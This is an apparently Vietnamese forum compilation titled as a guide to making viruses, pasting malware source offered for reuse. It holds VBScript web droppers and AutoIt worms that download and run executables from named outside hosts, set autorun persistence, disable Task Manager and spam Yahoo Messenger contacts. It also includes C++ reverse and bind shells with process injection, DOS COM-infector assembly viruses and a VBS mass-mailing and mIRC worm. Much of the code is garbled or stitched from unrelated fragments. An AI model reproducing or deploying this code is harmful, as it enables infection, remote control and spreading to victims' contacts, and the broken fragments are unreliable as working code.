cach tao vius

The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this[r]

(1)

Cách tạo virus

[YM Virus]nhut.be

dl = "http://nhut.be/dkc.exe"

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"") a1="Ado"

a2="db." a3="Str" a4="eam"

str1=a1&a2&a3&a4 str5=str1

set S = df.createobject(str5,"") S.type = 1

str6="GET"

x.Open str6, dl, False x.Send

fname1="bl4ck.com"

set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1) S.open

S.write x.responseBody S.savetofile fname1,2 S.close

set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0

</script>

[YM Virus]viet8x.evonet.ro <html>

:: Welcome :: </title>

(2)

on error resume next

dl = "http://viet8x.evonet.ro/task.exe" Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado"

set S = df.createobject(str5,"") S.type = 1

str6="GET"

fname1="bl4ck.com"

</script> </head>

<h3>You're welcome</h3> </center>

(3)

[YM Virus]Vuichoivn.com Scripts

dl = "http://vuichoivn.com/guitangban.exe" Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"") a1="Ado"

set S = df.createobject(str5,"") S.type =

str6="GET"

fname1="svchost32.exe"

</script>

[YM Virus]VuiVeVn.HP.Ms

$website = "http://72.232.123.170/~love/" $website2 = "Http://dasdasdasd"

If Not FileExists(@WindowsDir & "\taskmng.exe") Then

InetGet ($website & "/xlove.exe", @WindowsDir & "\taskmng.exe", 0, 1) Sleep(500)

EndIf

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi

ndows\CurrentVersion\Run", "BkavFw", "REG_SZ","C:\WINDOWS\taskmng.exe") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi

ndows\CurrentVersion\Run", "Task Manager", "REG_SZ","C:\WINDOWS\taskmng.exe")

(4)

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website2)

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz", "content url", "REG_SZ", $website2)

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast", "content url", "REG_SZ", $website2) RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi

ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", "wWw.LoveNovel.Kiss.To")

$title = WinGetTitle("Yahoo! Messenger") $wincheck = WinExists ($title)

ClipPut("http://adasd <=== See My Picture :X :X So Cute !!! (No Virus)") if $wincheck = then

BlockInput (1) WinActivate($title) send("!A")

send("M") sleep(600)

send("{DOWN}") send("{SHIFTDOWN}") send("{DOWN 70}") send("{enter}") send("{LSHIFT}") send("^v {ENTER}") BlockInput (0)

endif

Code virus gaixinh

Sưu tầm share bạn ; <AUT2EXE VERSION: 3.1.1.112>

; -; < -;AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>

; ; -;

; AutoIt Version: 3.1.0

(5)

;

; Script Function:

; Template AutoIt script. ;

; -; Script Start - Add your code below here

$version = "1.0"

AutoItSetOption ("TrayIconHide","1")

InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1) sleep(3000)

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir & "\Messenger.exe")

InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1) sleep(5000)

$checkfile = FileExists ( @WindowsDir & "\Version.txt" ) if $checkfile = then

$file = FileOpen (@WindowsDir & "\Version.txt",0 ) $read = FileRead($file,3)

FileClose($file)

if $read <> $version then

InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1) sleep (3000)

Run(@WindowsDir & "\Update.exe") endif

endif

RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V

iew\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/") RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V

iew\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1") AutoItSetOption ("WinTitleMatchMode", "2")

$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" ) if $check = then

(6)

FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe") endif

;; Đoạn xóa để đoạn mã khơng bị lợi dụng ;; xLuke

if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or ($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then $title = WinGetTitle("Yahoo! Messenger")

$wincheck = WinExists ($title)

ClipPut("Gai xinh ne , gai xinh ne : <a href="http://xrobots.net/Gift/?file=Gaixinh.jpg" target="_blank" rel="nofollow" class="limitview">http://xrobots.net/Gift/?

file=Gaixinh.jpg</a>") if $wincheck = then BlockInput (1)

WinActivate($title) send("!A")

send("M") sleep(400)

send("{DOWN}") send("{SHIFTDOWN}") send("{DOWN 70}") send("{enter}") send("{LSHIFT}") send("^v {ENTER}") BlockInput (0)

endif endif Next

; -; < -;AUT2EXE INCLUDE-END: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>

; -

coding ~ ntshell, tiny reverse win32 shell

-ntshell.cpp Code:

PHP Code:

//Reverse NT Shell 1.1 by D-oNe

(7)

//

//Start NC: nc.exe -l -p 666, Then Run ntshell.exe! //Optmization Code

#pragma optimize("gsy",on)

#pragma comment(linker,"/RELEASE")

#pragma comment(linker,"/ENTRY:EntryPoint") #pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment(linker,"/MERGE:.reloc=.data")

#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078") #pragma comment(linker,"/FILEALIGN:0x200")

#pragma comment(linker,"/subsystem:windows") #pragma comment(linker,"/base:0x7D000000") //Libs

#pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #pragma comment(lib, "ws2_32") //Includes

#define WIN32_LEAN_AND_MEAN #include <windows.h>

#include <tlhelp32.h> #include <winsock2.h> //Settings

char *szIP = "127.0.0.1";

int port = 666;

char *injproc = "notepad.exe"; //Shell Code

DWORD WINAPI shell(LPVOID param) {

WSADATA WSAData;

struct sockaddr_in sin; SOCKET sock;

STARTUPINFO si;

PROCESS_INFORMATION pi;

LoadLibrary("kernel32.dll"); LoadLibrary("user32.dll"); LoadLibrary("ws2_32.dll"); memset(&sin, 0, sizeof(sin));

WSAStartup(MAKEWORD(1, 1), &WSAData); sin.sin_family = AF_INET;

sin.sin_port = htons(port);

sin.sin_addr.s_addr = inet_addr(szIP);

sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0,

0);

connect(sock, (struct sockaddr*)&sin, sizeof(sin)); memset(&si, 0, sizeof(si));

memset(&pi, 0, sizeof(pi)); si.cb = sizeof(STARTUPINFO);

si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE;

(8)

si.hStdError = (HANDLE)sock;

CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, &pi);

return 0; }

//Inject Code

bool injectcode(HANDLE hProcess, LPTHREAD_START_ROUTINE lpCodeToInj ect)

{

DWORD dwThread, dwSize, dwWritten; PBYTE pbModule;

LPVOID lpBuffer; HANDLE hThread;

pbModule = (PBYTE)GetModuleHandle(0); dwSize = ((PIMAGE_NT_HEADERS)(pbModule+ ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew ))->OptionalHeader.SizeOfImage;

VirtualFreeEx(hProcess, pbModule, 0, MEM_RELEASE);

lpBuffer = VirtualAllocEx(hProcess, pbModule, dwSize, MEM_COM MIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if (!lpBuffer) return FALSE;

if (!WriteProcessMemory(hProcess, lpBuffer, pbModule, dwSize, &dwWritten)) return FALSE;

hThread = CreateRemoteThread(hProcess, 0, 0, lpCodeToInject,

pbModule, 0, &dwThread);

if (!hThread) return FALSE; CloseHandle(hThread); CloseHandle(hProcess); return TRUE;

}

DWORD GetPID(char *szExe) {

HANDLE hProcessSnap; PROCESSENTRY32 pe32;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,

);

pe32.dwSize = sizeof(PROCESSENTRY32); if (!Process32First(hProcessSnap, &pe32)) {

CloseHandle(hProcessSnap); return 0;

} {

if (lstrcmpi(pe32.szExeFile, szExe) == 0) {

return (pe32.th32ProcessID); break;

} }

while (Process32Next(hProcessSnap, &pe32)); CloseHandle(hProcessSnap);

(9)

void EntryPoint() {

HANDLE hProcess;

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetPID(injp roc));

injectcode(hProcess, shell); ExitProcess(0);

}

R@n

's items

tiếp theo

mShell.cpp Code

Trích:

//mShell 0.2 by D-oNe, aka_done@hotmail.com

//

//Optimization Code

#pragma optimize("gsy",on)

#pragma comment(linker,"/RELEASE") #pragma comment(linker,"/ENTRY:shell")

#pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment(linker,"/MERGE:.reloc=.data")

#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078") #pragma comment(linker,"/FILEALIGN:0x200")

#pragma comment(linker,"/subsystem:windows") //Includes

#include <windows.h> #include <winsock.h> //Port To Listen On const int port = 23; //Shell Handler

DWORD WINAPI shell_handler(void *sendsock_) {

(10)

HANDLE hPipeRead1, hPipeWrite1, hPipeRead2, hPipeWrite2; int count = 0, i;

PROCESS_INFORMATION pInfo; SECURITY_ATTRIBUTES secu = {

(DWORD)sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };

SOCKET sendsock = (SOCKET)sendsock_; STARTUPINFO sInfo;

if (sendsock == INVALID_SOCKET) return 0; CreatePipe(&hPipeRead1, &hPipeWrite1, &secu, 0); CreatePipe(&hPipeRead2, &hPipeWrite2, &secu, 0);

GetEnvironmentVariable("ComSpec", szCmdPath, sizeof(szCmdPath)); memset(&sInfo, 0, sizeof(sInfo));

memset(&pInfo, 0, sizeof(pInfo)); sInfo.cb = sizeof (STARTUPINFO);

sInfo.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES; sInfo.wShowWindow = SW_HIDE;

sInfo.hStdInput = hPipeRead2; sInfo.hStdOutput = hPipeWrite1; sInfo.hStdError = hPipeWrite1;

CreateProcess(NULL, szCmdPath, &secu, &secu, TRUE, 0, NULL, NULL, &sInfo, &pInfo);

while (sendsock != SOCKET_ERROR) {

memset(szBuffer, 0, sizeof(szBuffer));

PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL); while (lpNumberOfBytesRead)

{

if (!ReadFile(hPipeRead1, szBuffer, sizeof(szBuffer), &lpNumberOfBytesRead, NULL)) break;

else send(sendsock, szBuffer, lpNumberOfBytesRead, 0);

PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL); }

i = recv(sendsock, szBuffer, sizeof(szBuffer) ,0); if (sendsock == 0)

{

count++;

if (count > 1) break; }

if (!strstr(szBuffer, "_exit") == 0) {

TerminateProcess(pInfo.hProcess, 0); return 0;

(11)

else WriteFile(hPipeWrite2, szBuffer, i, &lpNumberOfBytesRead, 0); Sleep(10);

}

TerminateProcess(pInfo.hProcess, 0); return 0;

}

//Shell Listener void shell() {

DWORD dwID; register int size;

SOCKET shellsock, sendsock; struct sockaddr_in sin;

WSADATA wsadata;

if (WSAStartup(MAKEWORD(2,2), &wsadata) != 0) ExitProcess(0); sin.sin_family = AF_INET;

sin.sin_addr.s_addr = 0; sin.sin_port = htons(port); size = sizeof(sin);

shellsock = socket (AF_INET, SOCK_STREAM, 0); bind(shellsock, (struct sockaddr *)&sin, sizeof(sin)); listen(shellsock, 0);

while (1) {

sendsock = accept(shellsock,(struct sockaddr *)&sin, &size);

if (sendsock != INVALID_SOCKET) CreateThread(0, 0, shell_handler, (void *)sendsock, 0, &dwID);

Sleep(100); }

closesocket(sendsock); closesocket(shellsock); WSACleanup(); return;

}

; The EXEcution III Virus. ;

; Well, you're now the prouw owner of the smallest virus ever made! ; only 23 bytes long and ofcourse again very lame

; But what the heck, it's just an educational piece of code!! ;

(12)

; Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his ; nice try to make the smallest (27 bytes and 25 bytes) virus

gotcha!! ;-)) ;

; BTW Don't forget, I only tested it unter DOS 5.0 so on other versions

; it might not work! _CODE SEGMENT ASSUME CS:_CODE ORG 100h

START: ; That's where we're starting

FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH MOV AH,4Eh ; Let's search!

DO_IT: MOV DX,SI ; Make DX = 100h (offset file) INT 21h ; Search now dude!

MOV AX,3D01h ; Hmm, infect that fucking file! MOV DX,9Eh ; Name is at DS:[9Eh]

INT 21h ; Go it!

XCHG BX,AX ; Put the handle in BX MOV AH,40h ; Write myself!

JMP DO_IT ; Use other routine _CODE ENDS

END START

Virus FirstStar Source Code

;

******************************************************** ********************;

; ;

(13)

; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ;

; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ;

; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ;

; *** NOT FOR GENERAL DISTRIBUTION *** ;

; ;

; This File is for the Purpose of Virus Study Only! It Should not be Passed ;

; Around Among the General Public It Will be Very Useful for Learning how ;

; Viruses Work and Propagate But Anybody With Access to an Assembler can ;

; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;

; Experience can Turn it Into a far More Malevolent Program Than it Already ;

; Is Keep This Code in Responsible Hands! ; ; ;

;

******************************************************** ********************;

;

; First-Star / 222 Virus ;

; (C) by Glenn Benton in 1992

; This is a non-resident direct action COM infector in current dirs.

; ; ;

(14)

Start: Jmp MainVir Db '*'

MainVir: Call On1 On1: Pop BP

Sub BP,Offset MainVir+3 Push Ax

Mov Ax,Cs:OrgPrg[BP] Mov Bx,Cs:OrgPrg[BP]+2 Mov Cs:Start+100h,Ax Mov Cs:Start[2]+100h,Bx

Mov Ah,1ah Mov Dx,0fd00h Int 21h

Mov Ah,4eh

Search: Lea Dx,FileSpec[BP] Xor Cx,Cx

Int 21h Jnc Found Jmp Ready

Found: Mov Ax,4300h Mov Dx,0fd1eh Int 21h

Push Cx

Mov Ax,4301h Xor Cx,Cx Int 21h

Mov Ax,3d02h Int 21h

Mov Bx,5700h Xchg Ax,Bx Int 21h Push Cx Push Dx Mov Ah,3fh

(15)

Int 21h

Mov Ax,Cs:[OrgPrg][BP] Cmp Ax,'MZ'

Je ExeFile Cmp Ax,'ZM' Je ExeFile

Mov Ah,Cs:[OrgPrg+3][BP] Cmp Ah,'*'

Jne Infect ExeFile: Call Close Mov Ah,4fh Jmp Search FSeek: Xor Cx,Cx Xor Dx,Dx Int 21h Ret

Infect: Mov Ax,4202h Call FSeek

Sub Ax,3

Mov Cs:CallPtr[BP]+1,Ax Mov Ah,40h

Lea Dx,MainVir[BP] Mov Cx,VirLen Int 21h

Mov Ax,4200h Call FSeek Mov Ah,40h

Lea Dx,CallPtr[BP] Mov Cx,4

Int 21h Call Close Ready: Mov Ah,1ah Mov Dx,80h Int 21h Pop Ax

(16)

Retf Close: Pop Si Pop Dx Pop Cx

Mov Ax,5701h Int 21h

Mov Ah,3eh Int 21h

Mov Ax,4301h Pop Cx

Mov Dx,0fd1eh Int 21h

Push Si Ret

CallPtr Db 0e9h,0,0 FileSpec Db '*.COM',0 OrgPrg: Int 20h Nop

Nop

VirLen Equ $-MainVir ;

******************************************************** ********************;

; ;

; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ;

; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ;

(17)

; ;

; *** NOT FOR GENERAL DISTRIBUTION *** ;

; ;

; This File is for the Purpose of Virus Study Only! It Should not be Passed ;

; Around Among the General Public It Will be Very Useful for Learning how ;

; Viruses Work and Propagate But Anybody With Access to an Assembler can ;

; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;

; Experience can Turn it Into a far More Malevolent Program Than it Already ;

; Is Keep This Code in Responsible Hands! ; ; ;

;

******************************************************** ********************;

;

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;

;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;

;

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

MÃ NGUỒN CỦA VIRUS HOME PAGE

'Homepage Created By Robinhood

Set FSO =3D createobject("scripting.filesystemobject") dirsystem =3D FSO.getspecialfolder(1)

Path=3D dirsystem & "\Win32.dll.vbs" Set WSH createobject("wscript.shell") WSH.regwrite

(18)

"wscript.exe " & Path& " %"

FSO.copyfile wscript.scriptfullname, Path payload=20

If =

WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\Send

mail") <> then sendmail

End if If

WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\IRC"

) <> then IRC "" End if

Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname) sourcetext sourcefile.readall

sourcefile.close Do

if not(FSO.fileexists(wscript.scriptfullname)) then

set filebackup=3D FSO.createtextfile(wscript.scriptfullname) filebackup.write sourcetext

filebackup.close end if

sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Win32dll"

)

If s<> "wscript.exe " & Path& " %" then WSH.regwrite =

"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe " & Path& " %"

end if s=3D "" loop=20

Function sendmail()

Set myapp =3D CreateObject("Outlook.Application") If myapp =3D "Outlook" Then

Set myname =3D myapp.GetNameSpace("MAPI") Set myaddlists =3D myname.AddressLists

For Each myaddlist In myaddlists

If myaddlist.AddressEntries.Count <> Then x =3D myaddlist.AddressEntries.Count For i =3D To x

(19)

mailitem.To =3D myadd.Address

mailitem.Subject =3D "Very Important!"

mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""

execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &

Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)

copypath Path

mailitem.DeleteAfterSubmit True myatts.Add copypath

If mailitem.To <> "" Then mailitem.Send

End If Next End If Next End If End function

Function IRC(ircpath) If ircpath <> "" Then programpath

WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion

\ProgramFilesDir")

If FSO.fileexists("c:\mirc\mirc.ini") Then ircpath =3D "c:\mirc"

ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then ircpath =3D "c:\mirc32"

ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then ircpath =3D programpath & "\mirc"

ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then ircpath =3D programpath & "\mirc"

Else

ircpath =3D "" End If

End If

If ircpath <> "" Then

Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True) text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"

text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"

text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }" text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "

text =3D text & Path

(20)

ircscript.Close End If

End Function=20 Function payload() Randomize

If + Int(Rnd * 5) =3D then

WSH.run "Http://www.virii.com.ar",false end if

end function Code:

; virus from ALT-11 mag

; -;

; Coded by: Azagoth

; -; Assemble using Turbo Assembler:

; tasm /m2 <filename>.asm ; tlink /t <filename>.obj ;

-; - Non-Overwriting COM infector (excluding COMMAND.COM) ; - COM growth: XXX bytes

; - It searches the current directory for uninfected files If none are

; found, it searches previous directory until it reaches root and no more

; uninfected files are found (One infection per run) ; - Also infects read-only files

; - Restores attributes, initial date/time-stamps, and original path ;

.model tiny code

org 100h ; adjust for psp start:

call get_disp ; push ip onto stack get_disp:

pop bp ; bp holds current ip sub bp, offset get_disp ; bp = code displacement ; original label offset is stored in machine code

(21)

mov ah, 47h ; save cwd

xor dl, dl ; = default drive lea si, [bp + org_path]

int 21h get_dta:

mov ah, 2fh int 21h

mov [bp + old_dta_off], bx ; save old dta offset set_dta: ; point to dta record mov ah, 1ah

lea dx, [bp + dta_filler] int 21h

search:

mov ah, 4eh ; find first file

mov cx, [bp + search_attrib] ; if successful dta is lea dx, [bp + search_mask] ; created

int 21h

jnc clear_attrib ; if found, continue find_next:

mov ah, 4fh ; find next file int 21h

jnc clear_attrib still_searching:

mov ah, 3bh

lea dx, [bp + previous_dir] ; cd int 21h

jnc search

jmp bomb ; at root, no more files clear_attrib:

mov ax, 4301h

xor cx, cx ; get rid of attributes lea dx, [bp + dta_file_name]

int 21h open_file:

mov ax, 3D02h ; AL=2 read/write lea dx, [bp + dta_file_name]

int 21h

xchg bx, ax ; save file handle ; bx won't change from now on

check_if_command_com: cld

lea di, [bp + com_com]

lea si, [bp + dta_file_name]

(22)

repe cmpsb ; repeat while equal jne check_if_infected

jmp close_file check_if_infected:

mov dx, word ptr [bp + dta_file_size] ; only use first word since

; COM file sub dx, ; file size - mov ax, 4200h

mov cx, ; cx:dx ptr to offset from

int 21h ; origin of move

mov ah, 3fh ; read last characters mov cx,

lea dx, [bp + last_chars] int 21h

mov ah, [bp + last_chars] cmp ah, [bp + virus_id] jne save_3_bytes

mov ah, [bp + last_chars + 1] cmp ah, [bp + virus_id + 1] jne save_3_bytes

jmp close_file save_3_bytes:

mov ax, 4200h ; 00=start of file xor cx, cx

xor dx, dx int 21h mov ah, 3Fh mov cx,

lea dx, [bp + _3_bytes] int 21h

goto_eof:

mov ax, 4202h ; 02=End of file

xor cx, cx ; offset from origin of move

xor dx, dx ; (i.e nowhere) int 21h ; ax holds file size ; since it is a COM file, overflow will not occur

save_jmp_displacement:

sub ax, ; file size - = jmp disp

mov [bp + jmp_disp], ax write_code:

(23)

mov cx, virus_length ;*** equate lea dx, [bp + start]

int 21h goto_bof:

mov ax, 4200h xor cx, cx xor dx, dx int 21h

write_jmp: ; to file mov ah, 40h

mov cx,

lea dx, [bp + jmp_code] int 21h

inc [bp + infections] restore_date_time:

mov ax, 5701h

mov cx, [bp + dta_file_time] mov dx, [bp + dta_file_date] int 21h

close_file:

mov ah, 3eh int 21h restore_attrib:

xor ch, ch

mov cl, [bp + dta_file_attrib] ; restore original attributes

mov ax, 4301h

lea dx, [bp + dta_file_name] int 21h

done_infecting?:

mov ah, [bp + infections] cmp ah, [bp + max_infections] jz bomb

jmp find_next bomb:

; cmp bp,

; je restore_path ; original run ;

; Stuff deleted restore_path:

(24)

mov ah, 3bh ; cd to original path lea dx, [bp + org_path]

int 21h restore_dta:

mov ah, 1ah

mov dx, [bp + old_dta_off] int 21h

restore_3_bytes: ; in memory lea si, [bp + _3_bytes]

mov di, 100h

cld ; auto-inc si, di mov cx,

rep movsb return_control_or_exit?:

cmp bp, ; bp = if original run je exit

mov di, 100h ; return control back to prog

jmp di ; -> cs:100h exit:

mov ax, 4c00h int 21h

; Variable Declarations

-old_dta_off dw ; offset of old dta address

; - dta record

dta_filler db 21 dup (0) dta_file_attrib db

dta_file_time dw dta_file_date dw dta_file_size dd

dta_file_name db 13 dup (0)

; -search_mask db '*.COM',0 ; files to infect: *.COM search_attrib dw 00100111b ; all files a,s,h,r com_com db 'COMMAND.COM'

previous_dir db ' ',0 root db '\',0

org_path db 64 dup (0) ; original path infections db ; counter

max_infections db

(25)

last_chars db 0, ; last chars = ID ? virus_id db 'AZ'

eov: ; end of virus virus_length equ offset eov - offset start

end start

Code:

VSize=085h

Code Segment

Assume CS:Code org

db 4Dh jmp Start Org 600h

Bytes db 0CDh,20h,90h,90h Start: mov si, 0100h

mov bx, offset Int21 mov cx, 0050h

mov di, si add si, [si+2] push di

movsw movsw

mov es, cx cmpsb

je StartFile dec si

dec di rep movsw

mov es, cx xchg ax, bx xchg ax, cx Loop0: xchg ax, cx

xchg ax, word ptr es:[di-120h] stosw

jcxz Loop0 xchg ax, bx StartFile:

push ds pop es ret

(26)

push bx push dx push ds push es

mov ax, 3D02h call DoInt21 jc EndExec

cbw ;Zero AH cwd ;Zero DX

mov bx, si ;Move handle to BX mov ds, ax ;Set DS and ES to 60h, mov es, ax ;the virus data segment mov ah, 3Fh ;Read first bytes int 69h

mov al, 4Dh

scasb ;Check for 4D5Ah or infected file mark

je Close ;.EXE or already infected mov al,

call LSeek ;Seek to the end, SI now contains file size

mov cl, VSize ;Virus size in CX, prepare to write

int 69h ;AH is 40h, i.e Write operation mov ax, 0E94Dh ;Virus header in AX

stosw ;Store it

xchg ax, si ;Move file size in AX stosw ;Complete JMP instruction xchg ax, dx ;Zero AX

call LSeek ;Seek to the beginning

int 69h ;AH is 40h, write the virus header

Close: mov ah,3Eh ;Close the file int 69h

EndExec: pop es pop ds pop dx pop bx pop ax

End21: jmp dword ptr cs:[69h * 4]

LSeek: mov ah, 42h ;Seek operation cwd ;Zero DX

DoInt21: xor cx, cx ;External entry for Open, zero cx

int 69h

mov cl, ;4 bytes will be read/written xchg ax, si ;Store AX in SI

mov ax, 4060h ;Prepare AH for Write xor di, di ;Zero DI

(27)

End ;

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Ä

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ

;

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Ä

Virus MSBlaster Source Code

Cái nì Assemble mừ save dạng .vbs you excluding

COMMAND.COM

Không biết phải không ta Quote:

Coded by: Azagoth

; -; Assemble using Turbo Assembler: ; tasm /m2 <filename>.asm

; tlink /t <filename>.obj

; -; - Non-Overwriting COM infector (excluding COMMAND.COM) ; - COM growth: XXX bytes

; - It searches the current directory for uninfected files If none are ; found, it searches previous directory until it reaches root and no more ; uninfected files are found (One infection per run)

; - Also infects read-only files

; - Restores attributes, initial date/time-stamps, and original path. ; - Muốn lấy nì nè

Quote:

/* global variables*/char Filename[SOME_CONST];DWORD i_ip_A;DWORD

i_ip_B;DWORD i_ip_C;DWORD i_ip_D;DWORD i_ip_D_?;/* Deliberately left blank This function listens on ports 69 and 135 for incoming connections It then tries to spread itself It might have spread faster had it done a progressive network scan.*/void

spreadworm(){}/* Deliberately left blank Was designed to a DoS attack on

(28)

attacking windowsupdate.microsoft.com or microsoft.com for real entertainment value.*/SEC_THREAD_START payload(){}// mainint main(){ in_addr in; DWORD temp_ip_buf; hostent _hostent; char local_ip_address[0x200], month[3],

